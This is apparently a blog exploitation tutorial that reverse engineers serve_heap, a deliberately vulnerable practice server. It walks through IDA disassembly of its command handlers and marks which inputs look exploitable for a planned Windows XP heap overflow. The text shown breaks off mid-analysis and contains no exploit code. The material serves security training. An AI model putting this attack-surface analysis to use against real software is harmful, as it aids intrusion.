THE

SPRAWL

  •  
  •  
  •  
  • Heap Overflows For Humans is a series of articles by Steven Seeley that explore heap exploitation on Windows. In the second article of the series, Steven developed a practice exercise based on the modified source of vulnserver by Stephen Bradshaw. Just like the original program, the serve_heap is a multithreaded server; however, almost all of the processing is performed on the heap making it perfect for practice of heap overflow exploitation.

    In this article I will cover all of the steps involved in building an exploit for a heap overflow vulnerability in serve_heap targetting the Windows XP SP3 platform with DEP set to AlwaysOn. As with previous such guides, my goal is to not only present you with a solution, but also share all of the challenges, failures, and reasoning involved in discovering the vulnerability and building the exploit.

    Spoiler Warning: I would highly recommend you to go over the challenge yourself and come back to this article to find a possibly different solution or in case you get stuck.

    Reversing

    Before diving into the disassembly, let's attempt to interact with the application remotely. Serve_heap listens for connections on port 9999, below is a sample interactive session:

    Welcome to Heap Vulnerable Server! Enter HELP for h
    
    HELP
    
    Valid Commands:
    HELP
    STATS [stat_value]
    RTIME [rtime_value]
    LTIME [ltime_value]
    SRUN [srun_value]
    TRUN [trun_value]
    GMON [gmon_value]
    GDOG [gdog_value]
    KSTET [kstet_value]
    GTER [gter_value]
    HTER [hter_value]
    LTER [lter_value]
    KSTAN [lstan_value]
    EXIT
    
    STATS AAAA
    STATS VALUE NORMAL
    
    EXIT
    GOODBYE
    

    NOTE: A default telnet session produces incorrectly aligned output.

    Based on the above output, the server supports a number of commands which accept user input. A detailed reverse engineering session is required to understand the purpose of these commands and how they could be abused.

    Main

    Let's begin by looking at the main() function first. It begins with a call to HeapCreate() to create a private heap for the application and stores a handle in the global variable _hHeap:

    .text:004012C4 mov     [esp+298h+param3], 0 ; dwMaximumSize
    .text:004012CC mov     [esp+298h+param2], 0 ; dwInitialSize
    .text:004012D4 mov     [esp+298h+param1], 40000h ; flOptions
    .text:004012DB call    _HeapCreate@12  ; HeapCreate(x,x,x)
    .text:004012E0 sub     esp, 0Ch
    .text:004012E3 mov     ds:_hHeap, eax
    

    Notice that the flOptions flag was set to 0x00040000 which corresponds to HEAP_CREATE_ENABLE_EXECUTE. The flag makes all allocations on the private heap executable which may come in handy for shellcode storage (considering DEP is enabled).

    The next series of instructions verifies that at most one command line parameter was specified. Satisfied, a check is performed whether or not an optional command line parameter was provided. If none was provided, a default string value 9999 is used to populate the local variable Port.

    .text:00401305 cmp     [ebp+argc], 2
    .text:00401309 jle     short loc_401336
      :
    .text:00401336 loc_401336:
    .text:00401336 cmp     [ebp+argc], 2
    .text:0040133A jnz     loc_4013CC
      :
    .text:004013CC loc_4013CC:
    .text:004013CC mov     [esp+298h+param3], 6
    .text:004013D4 mov     [esp+298h+param2], offset DefaultPort ; "9999"
    .text:004013DC lea     eax, [ebp+Port]
    .text:004013DF mov     [esp+298h+param1], eax ; Dest
    .text:004013E2 call    _strncpy
    

    Alternatively, the first command line parameter is exposed to a series of sanity checks to make sure it could be used as a valid port number. If all tests pass, the user provided value is used to populate the local Port variable:

    .text:00401340 mov     eax, [ebp+argv]
    .text:00401343 add     eax, 4
    .text:00401346 mov     eax, [eax]      ; command line parameter
    .text:00401348 mov     [esp+298h+param1], eax ; Str
    .text:0040134B call    _atoi           ; convert to integer
    .text:00401350 test    eax, eax        ; test it's not zero
    .text:00401352 jle     short loc_4013A1
    ; ---------------------------------------------------------------------------
    .text:00401354 mov     eax, [ebp+argv]
    .text:00401357 add     eax, 4
    .text:0040135A mov     eax, [eax]      ; Command line parameter
    .text:0040135C mov     [esp+298h+param1], eax ; Str
    .text:0040135F call    _atoi           ; convert to integer
    .text:00401364 cmp     eax, 65535      ; test it's <= 65535
    .text:00401369 jg      short loc_4013A1
    ; ---------------------------------------------------------------------------
    .text:0040136B mov     eax, [ebp+argv]
    .text:0040136E add     eax, 4
    .text:00401371 mov     eax, [eax]      ; command line parameter
    .text:00401373 mov     [esp+298h+param1], eax ; Str
    .text:00401376 call    _strlen         ; string length
    .text:0040137B cmp     eax, 6          ; test it's <= 6 characters
    .text:0040137E ja      short loc_4013A1
    ; ---------------------------------------------------------------------------
    .text:00401380 mov     [esp+298h+param3], 6 ; Count
    .text:00401388 mov     eax, [ebp+argv]
    .text:0040138B add     eax, 4
    .text:0040138E mov     eax, [eax]      ; command line parameter
    .text:00401390 mov     [esp+298h+param2], eax ; Source
    .text:00401394 lea     eax, [ebp+Port]
    .text:00401397 mov     [esp+298h+param1], eax ; Dest
    .text:0040139A call    _strncpy        ; copy string to Port
    .text:0040139F jmp     short loc_4013E7
    

    As a result, you can request the service to run on a different port by specifying a value between 1 and 65535 on the command line.

    At this point the application has sufficient information to initialize Windows Sockets, open a TCP socket, bind to the default or custom port, and set up a listener. All of this code is pretty standard, so I will skip its disassembly in the interests of saving space. However, the accept() loop requires some additional investigation:

    .text:00401683 loc_401683:             ; loop while socket is valid
    .text:00401683 cmp     [ebp+s], 0
    .text:0040168A jz      loc_401782
    ; ---------------------------------------------------------------------------
    .text:00401690 mov     [esp+298h+param1], offset aWaitingForClie ; "(+) Waiting for client connections...\n"
    .text:00401697 call    _printf
    .text:0040169C lea     eax, [ebp+addrlen]
    .text:004016A2 mov     [esp+298h+param3], eax ; addrlen
    .text:004016A6 lea     eax, [ebp+addr]
    .text:004016AC mov     [esp+298h+param2], eax ; addr
    .text:004016B0 mov     eax, [ebp+s]
    .text:004016B6 mov     [esp+298h+param1], eax ; s
    .text:004016B9 call    _accept@12      ; accept(x,x,x)
    .text:004016BE sub     esp, 0Ch
    .text:004016C1 mov     [ebp+conn_socket], eax ; store connection socket
    .text:004016C7 cmp     [ebp+conn_socket], 0FFFFFFFFh ; check the socket is valid
    .text:004016CE jnz     short loc_40170A
    

    Once the accept() returns a new client connection socket, the value is verified and a new thread is created with the socket as a parameter:

    .text:00401744 mov     [esp+298h+param6], 0 ; lpThreadId
    .text:0040174C mov     [esp+298h+param5], 0 ; dwCreationFlags
    .text:00401754 mov     eax, [ebp+conn_socket]
    .text:0040175A mov     [esp+298h+param4], eax ; lpParameter
    .text:0040175E mov     [esp+298h+param3], offset _ConnectionHandler@4 ; lpStartAddress
    .text:00401766 mov     [esp+298h+param2], 0 ; dwStackSize
    .text:0040176E mov     [esp+298h+param1], 0 ; lpThreadAttributes
    .text:00401775 call    _CreateThread@24 ; CreateThread(x,x,x,x,x,x)
    

    Notice that the lpStartAddress parameter is populated with the function pointer ConnectionHandler. It is likely that all of the client session handling logic is located in this function.

    ConnectionHandler

    The ConnectionHandler function comprises the core of the application logic and consists of a series of command handling segments. Looking at the block graph generated by IDA, we can see a "step-like" structure with a flat base, typical of a switch or an if-else code structures:

    Let's analyze the function in small chunks in order to understand the purpose of each command starting with the local variable initialization:

    .text:0040199D mov     [ebp+maxlen], 4096 ; initialize maxlen variable
    .text:004019A4 mov     [esp+5A8h+param1], 4096 ; Size
    .text:004019AB call    _malloc         ; allocate 4096 bytes on the default heap
    .text:004019B0 mov     [ebp+buf1], eax ; store heap address in buf1
    .text:004019B3 mov     [esp+5A8h+param1], 1024 ; Size
    .text:004019BA call    _malloc         ; allocate 1024 bytes on the default heap
    .text:004019BF mov     [ebp+buf2], eax ; store heap address in buf3
    .text:004019C5 mov     [esp+5A8h+param3], 1000 ; Size
    .text:004019CD mov     [esp+5A8h+param2], 0 ; Val
    .text:004019D5 lea     eax, [ebp+buf3]
    .text:004019DB mov     [esp+5A8h+param1], eax ; Dst
    .text:004019DE call    _memset         ; zero out 1000 bytes in buf3
    .text:004019E3 mov     [esp+5A8h+param3], 4096 ; Size
    .text:004019EB mov     [esp+5A8h+param2], 0 ; Val
    .text:004019F3 mov     eax, [ebp+buf1]
    .text:004019F6 mov     [esp+5A8h+param1], eax ; Dst
    .text:004019F9 call    _memset         ; zero out 4096 bytes in buf1
    

    Notice the use of malloc() in the above two allocations as opposed to HeapAlloc(). Only HeapAlloc() allows specification of a private heap, as a result both of these allocations happen on application's default, non-executable heap.

    Following the two buffer allocations, the ConnectionHandler obtains lpThreadParameter containing the client socket and sends a standard user greeting:

    .text:004019FE mov     eax, [ebp+lpThreadParameter] ; conn_socket
    .text:00401A01 mov     [ebp+socket], eax
    .text:00401A07 mov     [esp+5A8h+param4], 0 ; flags
    .text:00401A0F mov     [esp+5A8h+param3], 51 ; len
    .text:00401A17 mov     [esp+5A8h+param2], offset buf ; "Welcome to Heap Vulnerable Server! Ente"...
    .text:00401A1F mov     eax, [ebp+socket]
    .text:00401A25 mov     [esp+5A8h+param1], eax ; s
    .text:00401A28 call    _send@16        ; send user greeting to the provided socket
    

    Next, up to 4096 bytes are received from the user and stored in the 4096 byte buffer, buf1:

    .text:00401A7E mov     [esp+5A8h+param4], 0 ; flags
    .text:00401A86 mov     eax, [ebp+maxlen]
    .text:00401A89 mov     [esp+5A8h+param3], eax ; len
    .text:00401A8D mov     eax, [ebp+buf1]
    .text:00401A90 mov     [esp+5A8h+param2], eax ; buf1
    .text:00401A94 mov     eax, [ebp+socket]
    .text:00401A9A mov     [esp+5A8h+param1], eax ; s
    .text:00401A9D call    _recv@16        ; receive 4096 bytes in buf1
    

    At this point we enter a series of if-else statements that extract a user command and execute the appropriate logic. Let's analyze all the commands in the order they are tested.

    HELP

    There are actually two handlers for the command HELP. The first one responds to HELP with a space following it. This is designed to handle a help request for a specific command. The default "Command specific help has not been implemented" message is sent for all inputs:

    .text:00401AB8 mov     [esp+5A8h+param3], 5 ; MaxCount
    .text:00401AC0 mov     [esp+5A8h+param2], offset Str2 ; "HELP " with space
    .text:00401AC8 mov     eax, [ebp+buf1]
    .text:00401ACB mov     [esp+5A8h+param1], eax ; Str1
    .text:00401ACE call    _strncmp
    .text:00401AD3 test    eax, eax
    .text:00401AD5 jnz     short loc_401B20
    ; ---------------------------------------------------------------------------
    .text:00401AD7 lea     edi, [ebp+tmpstr] ; get address of tmpstr
    .text:00401ADD mov     esi, offset aCommandSpecifi ; "Command specific help has not been impl"...
    .text:00401AE2 cld
    .text:00401AE3 mov     ecx, 47
    .text:00401AE8 rep movsb               ; copy message to tmpstr
    .text:00401AEA mov     [esp+5A8h+param4], 0 ; flags
    .text:00401AF2 mov     [esp+5A8h+param3], 47 ; len
    .text:00401AFA lea     eax, [ebp+tmpstr]
    .text:00401B00 mov     [esp+5A8h+param2], eax ; buf
    .text:00401B04 mov     eax, [ebp+socket]
    .text:00401B0A mov     [esp+5A8h+param1], eax ; s
    .text:00401B0D call    _send@16        ; send(x,x,x,x)
    .text:00401B12 sub     esp, 10h
    .text:00401B15 mov     [ebp+var_414], eax
    .text:00401B1B jmp     loc_40258A
    

    The second handler of the HELP command displays the message we have seen in the interactive session earlier:

    .text:00401B20 loc_401B20:             ; MaxCount
    .text:00401B20 mov     [esp+5A8h+param3], 4
    .text:00401B28 mov     [esp+5A8h+param2], offset aHelp_0 ; "HELP" without space
    .text:00401B30 mov     eax, [ebp+buf1]
    .text:00401B33 mov     [esp+5A8h+param1], eax ; Str1
    .text:00401B36 call    _strncmp
    .text:00401B3B test    eax, eax
    .text:00401B3D jnz     short loc_401B95
      :
    .text:00401B3F lea     ecx, [ebp+helpbuf]
    .text:00401B45 mov     edx, offset aValidCommandsH ; "Valid Commands:\nHELP\nSTATS [stat_valu"...
    .text:00401B4A mov     eax, 251
    .text:00401B4F mov     [esp+5A8h+param3], eax ; Size
    .text:00401B53 mov     [esp+5A8h+param2], edx ; Src
    .text:00401B57 mov     [esp+5A8h+param1], ecx ; Dst
    .text:00401B5A call    _memcpy
    .text:00401B5F mov     [esp+5A8h+param4], 0 ; flags
    .text:00401B67 mov     [esp+5A8h+param3], 251 ; len
    .text:00401B6F lea     eax, [ebp+helpbuf]
    .text:00401B75 mov     [esp+5A8h+param2], eax ; buf
    .text:00401B79 mov     eax, [ebp+socket]
    .text:00401B7F mov     [esp+5A8h+param1], eax ; s
    .text:00401B82 call    _send@16        ; send(x,x,x,x)
    .text:00401B87 sub     esp, 10h
    .text:00401B8A mov     [ebp+var_414], eax
    .text:00401B90 jmp     loc_40258A
    

    Remarks: Neither of these commands look particularly interesting from the exploitation standpoint.

    STATS

    The STATS command allocates a 120 byte buffer on the default heap and populates it with the first 120 bytes from the user input buffer:

    .text:00401BB8 mov     [esp+5A8h+param1], 120 ; Size
    .text:00401BBF call    _malloc         ; allocate 120 bytes on the default heap
    .text:00401BC4 mov     [ebp+tempbuf], eax
    .text:00401BCA mov     [esp+5A8h+param3], 120 ; Size
    .text:00401BD2 mov     [esp+5A8h+param2], 0 ; Val
    .text:00401BDA mov     eax, [ebp+tempbuf]
    .text:00401BE0 mov     [esp+5A8h+param1], eax ; Dst
    .text:00401BE3 call    _memset         ; zero out 120 bytes in tempbuf
    .text:00401BE8 mov     [esp+5A8h+param3], 120 ; Count
    .text:00401BF0 mov     eax, [ebp+buf1]
    .text:00401BF3 mov     [esp+5A8h+param2], eax ; Source
    .text:00401BF7 mov     eax, [ebp+tempbuf]
    .text:00401BFD mov     [esp+5A8h+param1], eax ; Dest
    .text:00401C00 call    _strncpy        ; copy 120 bytes from buf1 to tempbuf
    .text:00401C05 mov     eax, [ebp+tempbuf]
    .text:00401C0B mov     [esp+5A8h+param1], eax ; argstr
    .text:00401C0E call    _Function4      ; call Function4
    .text:00401C13 mov     [esp+5A8h+param4], 0 ; flags
    .text:00401C1B mov     [esp+5A8h+param3], 19 ; len
    .text:00401C23 mov     [esp+5A8h+param2], offset aStatsValueNorm ; "STATS VALUE NORMAL\n"
    .text:00401C2B mov     eax, [ebp+socket]
    .text:00401C31 mov     [esp+5A8h+param1], eax ; s
    .text:00401C34 call    _send@16        ; send(x,x,x,x)
    .text:00401C39 sub     esp, 10h
    .text:00401C3C mov     [ebp+var_414], eax
    .text:00401C42 jmp     loc_40258A
    

    Notice that a separate call is made to Function4 with the 120 byte tempbuf as the parameter. There are actually four similar functions in the application which are called by various commands in the ConnectionHandler: Function1, Function2, Function3, and Function4. I will defer the analysis of these functions until after we have an understanding of all the commands.

    Remarks: The command may be interesting, because it calls Function4 with a 120 byte user controlled buffer.

    RTIME

    The RTIME command allocates a 520 byte buffer on the default heap and populates it with the first 520 bytes from the user input buffer:

    .text:00401C6A mov     [esp+5A8h+param1], 520 ; Size
    .text:00401C71 call    _malloc
    .text:00401C76 mov     [ebp+tempbuf], eax
    .text:00401C7C mov     [esp+5A8h+param3], 520 ; Size
    .text:00401C84 mov     [esp+5A8h+param2], 0 ; Val
    .text:00401C8C mov     eax, [ebp+tempbuf]
    .text:00401C92 mov     [esp+5A8h+param1], eax ; Dst
    .text:00401C95 call    _memset
    .text:00401C9A mov     [esp+5A8h+param3], 520 ; Count
    .text:00401CA2 mov     eax, [ebp+buf1]
    .text:00401CA5 mov     [esp+5A8h+param2], eax ; Source
    .text:00401CA9 mov     eax, [ebp+tempbuf]
    .text:00401CAF mov     [esp+5A8h+param1], eax ; Dest
    .text:00401CB2 call    _strncpy
    .text:00401CB7 mov     [esp+5A8h+param4], 0 ; flags
    .text:00401CBF mov     [esp+5A8h+param3], 1Ah ; len
    .text:00401CC7 mov     [esp+5A8h+param2], offset aRtimeValueWith ; "RTIME VALUE WITHIN LIMITS\n"
    .text:00401CCF mov     eax, [ebp+socket]
    .text:00401CD5 mov     [esp+5A8h+param1], eax ; s
    .text:00401CD8 call    _send@16        ; send(x,x,x,x)
    .text:00401CDD sub     esp, 10h
    .text:00401CE0 mov     [ebp+var_414], eax
    .text:00401CE6 jmp     loc_40258A
    

    Remarks: Nothing interesting here, all of the buffers are properly allocated.

    LTIME

    The LTIME command is virtually identical to RTIME with the exception that we are dealing with a smaller 120 byte buffer:

    .text:00401D0E mov     [esp+5A8h+param1], 120 ; Size
    .text:00401D15 call    _malloc
    .text:00401D1A mov     [ebp+tempbuf], eax
    .text:00401D20 mov     [esp+5A8h+param3], 120 ; Size
    .text:00401D28 mov     [esp+5A8h+param2], 0 ; Val
    .text:00401D30 mov     eax, [ebp+tempbuf]
    .text:00401D36 mov     [esp+5A8h+param1], eax ; Dst
    .text:00401D39 call    _memset
    .text:00401D3E mov     [esp+5A8h+param3], 120 ; Count
    .text:00401D46 mov     eax, [ebp+buf1]
    .text:00401D49 mov     [esp+5A8h+param2], eax ; Source
    .text:00401D4D mov     eax, [ebp+tempbuf]
    .text:00401D53 mov     [esp+5A8h+param1], eax ; Dest
    .text:00401D56 call    _strncpy
    .text:00401D5B mov     [esp+5A8h+param4], 0 ; flags
    .text:00401D63 mov     [esp+5A8h+param3], 19h ; len
    .text:00401D6B mov     [esp+5A8h+param2], offset aLtimeValueHigh ; "LTIME VALUE HIGH, BUT OK\n"
    .text:00401D73 mov     eax, [ebp+socket]
    .text:00401D79 mov     [esp+5A8h+param1], eax ; s
    .text:00401D7C call    _send@16        ; send(x,x,x,x)
    .text:00401D81 sub     esp, 10h
    .text:00401D84 mov     [ebp+var_414], eax
    .text:00401D8A jmp     loc_40258A
    

    Remarks: Nothing interesting here, all of the buffers are properly allocated.

    SRUN

    Just like LTIME and RTIME, the SRUN command simply allocates a 120 byte buffer on the default heap and copies user input:

    .text:00401DB2 mov     [esp+5A8h+param1], 120 ; Size
    .text:00401DB9 call    _malloc
    .text:00401DBE mov     [ebp+tempbuf], eax
    .text:00401DC4 mov     [esp+5A8h+param3], 120 ; Size
    .text:00401DCC mov     [esp+5A8h+param2], 0 ; Val
    .text:00401DD4 mov     eax, [ebp+tempbuf]
    .text:00401DDA mov     [esp+5A8h+param1], eax ; Dst
    .text:00401DDD call    _memset
    .text:00401DE2 mov     [esp+5A8h+param3], 120 ; Count
    .text:00401DEA mov     eax, [ebp+buf1]
    .text:00401DED mov     [esp+5A8h+param2], eax ; Source
    .text:00401DF1 mov     eax, [ebp+tempbuf]
    .text:00401DF7 mov     [esp+5A8h+param1], eax ; Dest
    .text:00401DFA call    _strncpy
    .text:00401DFF mov     [esp+5A8h+param4], 0 ; flags
    .text:00401E07 mov     [esp+5A8h+param3], 0Eh ; len
    .text:00401E0F mov     [esp+5A8h+param2], offset aSrunComplete ; "SRUN COMPLETE\n"
    .text:00401E17 mov     eax, [ebp+socket]
    .text:00401E1D mov     [esp+5A8h+param1], eax ; s
    .text:00401E20 call    _send@16        ; send(x,x,x,x)
    .text:00401E25 sub     esp, 10h
    .text:00401E28 mov     [ebp+var_414], eax
    .text:00401E2E jmp     loc_40258A
    

    Remarks: Nothing interesting here, all of the buffers are properly allocated.

    TRUN

    Finally things are getting a bit more interesting with the TRUN command. After initializing a 3000 byte buffer on the default heap, the offset variable is initialized to point exactly after the command string:

    .text:00401E56 mov     [esp+5A8h+param1], 3000 ; Size
    .text:00401E5D call    _malloc
    .text:00401E62 mov     [ebp+tempbuf], eax
    .text:00401E68 mov     [esp+5A8h+param3], 3000 ; Size
    .text:00401E70 mov     [esp+5A8h+param2], 0 ; Val
    .text:00401E78 mov     eax, [ebp+tempbuf]
    .text:00401E7E mov     [esp+5A8h+param1], eax ; Dst
    .text:00401E81 call    _memset
    .text:00401E86 mov     [ebp+offset], 5 ; initialize offset
    

    Next, a loop is executed which continues until either the maximum received buffer is exceeded or a '.' character is found:

    .text:00401E90 loc_401E90:
    .text:00401E90 mov     eax, [ebp+offset]
    .text:00401E96 cmp     eax, [ebp+maxlen]  ; compare offset to maxlen
    .text:00401E99 jge     short loc_401EE0
    
    .text:00401E9B mov     eax, [ebp+buf1]
    .text:00401E9E add     eax, [ebp+offset] ; *buf1 + offset
    .text:00401EA4 cmp     byte ptr [eax], '.' ; check the current character
    .text:00401EA7 jnz     short loc_401ED6
      :
    .text:00401ED6 loc_401ED6:
    .text:00401ED6 lea     eax, [ebp+offset]
    .text:00401EDC inc     dword ptr [eax] ; offset++
    .text:00401EDE jmp     short loc_401E90 ; loop
    

    In the case where the '.' character was found, the first 3000 bytes are copied from the user input buffer, buf1, to the temporary 3000 byte buffer, tempbuf. The temporary buffer is passed to the Function3 call as the first parameter.

    .text:00401EA9 mov     [esp+5A8h+param3], 3000 ; Count
    .text:00401EB1 mov     eax, [ebp+buf1]
    .text:00401EB4 mov     [esp+5A8h+param2], eax ; Source
    .text:00401EB8 mov     eax, [ebp+tempbuf]
    .text:00401EBE mov     [esp+5A8h+param1], eax ; Dest
    .text:00401EC1 call    _strncpy
    .text:00401EC6 mov     eax, [ebp+tempbuf]
    .text:00401ECC mov     [esp+5A8h+param1], eax ; buf
    .text:00401ECF call    _Function3
    .text:00401ED4 jmp     short loc_401EE0
    

    Regardless whether the '.' was found or not, the allocated tempbuf is zeroed out and a confirmation message is sent to the user:

    .text:00401EE0 loc_401EE0:             ; Size
    .text:00401EE0 mov     [esp+5A8h+param3], 3000
    .text:00401EE8 mov     [esp+5A8h+param2], 0 ; Val
    .text:00401EF0 mov     eax, [ebp+tempbuf]
    .text:00401EF6 mov     [esp+5A8h+param1], eax ; Dst
    .text:00401EF9 call    _memset
    .text:00401EFE mov     [esp+5A8h+param4], 0 ; flags
    .text:00401F06 mov     [esp+5A8h+param3], 0Eh ; len
    .text:00401F0E mov     [esp+5A8h+param2], offset aTrunComplete ; "TRUN COMPLETE\n"
    .text:00401F16 mov     eax, [ebp+socket]
    .text:00401F1C mov     [esp+5A8h+param1], eax ; s
    .text:00401F1F call    _send@16        ; send(x,x,x,x)
    .text:00401F24 sub     esp, 10h
    .text:00401F27 mov     [ebp+var_414], eax
    .text:00401F2D jmp     loc_40258A
    

    Remarks: The command is interesting because a 3000 byte user controlled buffer can be submitted to Function3.

    GMON

    The GMON command populates a tempstr array with the message GMON_STARTED\n and passes the entire user input to the Function3 call.

    .text:00401F51 mov     eax, ds:dword_404422 ; "GMON"
    .text:00401F56 mov     [ebp+tempstr], eax
    .text:00401F5C mov     eax, ds:dword_404426 ; "_STA"
    .text:00401F61 mov     [ebp+tempstr+4], eax
    .text:00401F67 mov     eax, ds:dword_40442A ;" RTED"
    .text:00401F6C mov     [ebp+tempstr+8], eax
    .text:00401F72 movzx   eax, ds:byte_40442E ; '\n'
    .text:00401F79 mov     byte ptr [ebp+tempstr+0Ch], al
    .text:00401F7F mov     eax, [ebp+buf1]
    .text:00401F82 mov     [esp+5A8h+param1], eax ; buf
    .text:00401F85 call    _Function3
    .text:00401F8A mov     [esp+5A8h+param4], 0 ; flags
    .text:00401F92 mov     [esp+5A8h+param3], 0Dh ; len
    .text:00401F9A lea     eax, [ebp+tempstr]
    .text:00401FA0 mov     [esp+5A8h+param2], eax ; buf
    .text:00401FA4 mov     eax, [ebp+socket]
    .text:00401FAA mov     [esp+5A8h+param1], eax ; s
    .text:00401FAD call    _send@16        ; send(x,x,x,x)
    .text:00401FB2 sub     esp, 10h
    .text:00401FB5 mov     [ebp+var_414], eax
    .text:00401FBB jmp     loc_40258A
    

    Remarks: The command is interesting because the entire 4096 user submitted buffer is used as a parameter to the Function3 call.

    GDOG

    The GDOG instruction repeats the pattern established in several other commands where a fixed size buffer is allocated on the default heap and populated with a portion of user input. Unfortunately nothing interesting is done with that data:

    .text:00401FDF mov     [esp+5A8h+param3], 1024 ; Count
    .text:00401FE7 mov     eax, [ebp+buf1]
    .text:00401FEA mov     [esp+5A8h+param2], eax ; Source
    .text:00401FEE mov     eax, [ebp+buf2]
    .text:00401FF4 mov     [esp+5A8h+param1], eax ; Dest
    .text:00401FF7 call    _strncpy
    .text:00401FFC mov     [esp+5A8h+param4], 0 ; flags
    .text:00402004 mov     [esp+5A8h+param3], 0Dh ; len
    .text:0040200C mov     [esp+5A8h+param2], offset aGdogRunning ; "GDOG RUNNING\n"
    .text:00402014 mov     eax, [ebp+socket]
    .text:0040201A mov     [esp+5A8h+param1], eax ; s
    .text:0040201D call    _send@16        ; send(x,x,x,x)
    .text:00402022 sub     esp, 10h
    .text:00402025 mov     [ebp+var_414], eax
    .text:0040202B jmp     loc_40258A
    

    Remarks: Nothing interesting here, all of the buffers are properly allocated.

    KSTET

    The KSTET command allocates a 100 byte buffer on the default heap and populates it with the received user input. The tempbuf is used as a parameter to the Function2 call.

    .text:00402053 mov     [esp+5A8h+param1], 100 ; Size
    .text:0040205A call    _malloc
    .text:0040205F mov     [ebp+tempbuf], eax
    .text:00402065 mov     [esp+5A8h+param3], 100 ; Count
    .text:0040206D mov     eax, [ebp+buf1]
    .text:00402070 mov     [esp+5A8h+param2], eax ; Source
    .text:00402074 mov     eax, [ebp+tempbuf]
    .text:0040207A mov     [esp+5A8h+param1], eax ; Dest
    .text:0040207D call    _strncpy
    .text:00402082 mov     [esp+5A8h+param3], 4096 ; Size
    .text:0040208A mov     [esp+5A8h+param2], 0 ; Val
    .text:00402092 mov     eax, [ebp+buf1]
    .text:00402095 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402098 call    _memset
    .text:0040209D mov     eax, [ebp+tempbuf]
    .text:004020A3 mov     [esp+5A8h+param1], eax ; char *
    .text:004020A6 call    _Function2
    .text:004020AB mov     [esp+5A8h+param4], 0 ; flags
    .text:004020B3 mov     [esp+5A8h+param3], 11h ; len
    .text:004020BB mov     [esp+5A8h+param2], offset aKstetSuccessfu ; "KSTET SUCCESSFUL\n"
    .text:004020C3 mov     eax, [ebp+socket]
    .text:004020C9 mov     [esp+5A8h+param1], eax ; s
    .text:004020CC call    _send@16        ; send(x,x,x,x)
    .text:004020D1 sub     esp, 10h
    .text:004020D4 mov     [ebp+var_414], eax
    .text:004020DA jmp     loc_40258A
    

    Remarks: The command is interesting because the first 100 bytes of the user submitted buffer are passed to the Function2.

    GTER

    Similar to KSTET, the GTER command allocates a 180 byte buffer, tempbuf, on the default heap, populates it with the received input, and finally uses it as the first parameter to the Function1 call.

    .text:00402102 mov     [esp+5A8h+param1], 180 ; Size
    .text:00402109 call    _malloc
    .text:0040210E mov     [ebp+tempbuf], eax
    .text:00402114 mov     [esp+5A8h+param3], 1024 ; Size
    .text:0040211C mov     [esp+5A8h+param2], 0 ; Val
    .text:00402124 mov     eax, [ebp+buf2]
    .text:0040212A mov     [esp+5A8h+param1], eax ; Dst
    .text:0040212D call    _memset
    .text:00402132 mov     [esp+5A8h+param3], 180 ; Count
    .text:0040213A mov     eax, [ebp+buf1]
    .text:0040213D mov     [esp+5A8h+param2], eax ; Source
    .text:00402141 mov     eax, [ebp+tempbuf]
    .text:00402147 mov     [esp+5A8h+param1], eax ; Dest
    .text:0040214A call    _strncpy
    .text:0040214F mov     [esp+5A8h+param3], 4096 ; Size
    .text:00402157 mov     [esp+5A8h+param2], 0 ; Val
    .text:0040215F mov     eax, [ebp+buf1]
    .text:00402162 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402165 call    _memset
    .text:0040216A mov     eax, [ebp+tempbuf]
    .text:00402170 mov     [esp+5A8h+param1], eax ; char *
    .text:00402173 call    _Function1
    .text:00402178 mov     [esp+5A8h+param4], 0 ; flags
    .text:00402180 mov     [esp+5A8h+param3], 14 ; len
    .text:00402188 mov     [esp+5A8h+param2], offset aGterOnTrack ; "GTER ON TRACK\n"
    .text:00402190 mov     eax, [ebp+socket]
    .text:00402196 mov     [esp+5A8h+param1], eax ; s
    .text:00402199 call    _send@16        ; send(x,x,x,x)
    .text:0040219E sub     esp, 10h
    .text:004021A1 mov     [ebp+var_414], eax
    .text:004021A7 jmp     loc_40258A
    

    The command will also result in buffers buf1 and buf2 being set to all zero bytes.

    Remarks: The command is interesting because the first 100 bytes of the user submitted buffer are passed to the Function1 call.

    HTER

    The HTER command is particularly interesting in terms of its user input manipulations. It begins by initializing a 2048 byte temporary buffer, tempbuf, on the default application heap:

    .text:004021CF mov     [esp+5A8h+param3], 3 ; Size
    .text:004021D7 mov     [esp+5A8h+param2], 0 ; Val
    .text:004021DF lea     eax, [ebp+Str]
    .text:004021E5 mov     [esp+5A8h+param1], eax ; Dst
    .text:004021E8 call    _memset
    .text:004021ED mov     [esp+5A8h+param1], 2048 ; Size
    .text:004021F4 call    _malloc
    .text:004021F9 mov     [ebp+tempbuf], eax
    .text:004021FF mov     [esp+5A8h+param3], 2048 ; Size
    .text:00402207 mov     [esp+5A8h+param2], 0 ; Val
    .text:0040220F mov     eax, [ebp+tempbuf]
    .text:00402215 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402218 call    _memset
    .text:0040221D mov     [ebp+offset], 6 ; initialize offset (off-by-one)
    .text:00402227 mov     [ebp+tempoffset], 0
    

    Notice that the offset variable is initialized to the value 6 which is actually one more than necessary to separate the 5 bytes of the "HTER " command header from the remaining input. Next, the current and the following bytes are checked to make sure they are not null:

    .text:00402231
    .text:00402231 loc_402231:
    .text:00402231 mov     eax, [ebp+buf1]
    .text:00402234 add     eax, [ebp+offset]
    .text:0040223A cmp     byte ptr [eax], 0 ; check if the current byte is zero
    .text:0040223D jz      loc_4022DC
      :
    .text:00402243 mov     eax, [ebp+offset]
    .text:00402249 add     eax, [ebp+buf1]
    .text:0040224C inc     eax
    .text:0040224D cmp     byte ptr [eax], 0 ; check if the next byte is zero
    .text:00402250 jz      loc_4022DC
    

    If neither of the above checks trigger the jump, two bytes are retrieved from the receive buffer, buf1, and converted to an unsigned long integer using the strtoul function. The produced one byte value is stored in the tmpbuf at the current tempoffset:

    .text:00402256 mov     [esp+5A8h+param3], 2 ; Size
    .text:0040225E mov     eax, [ebp+offset]
    .text:00402264 add     eax, [ebp+buf1]
    .text:00402267 mov     [esp+5A8h+param2], eax ; Src
    .text:0040226B lea     eax, [ebp+tempstr2] ; copy two bytes
    .text:00402271 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402274 call    _memcpy
    .text:00402279 mov     [esp+5A8h+param3], 16 ; Radix
    .text:00402281 mov     [esp+5A8h+param2], 0 ; EndPtr
    .text:00402289 lea     eax, [ebp+tempstr2]
    .text:0040228F mov     [esp+5A8h+param1], eax ; Str
    .text:00402292 call    _strtoul        ; str -> unsigned long
    .text:00402297 mov     [ebp+tmpbuf2], eax
    .text:0040229D mov     [esp+5A8h+param3], 1 ; Size
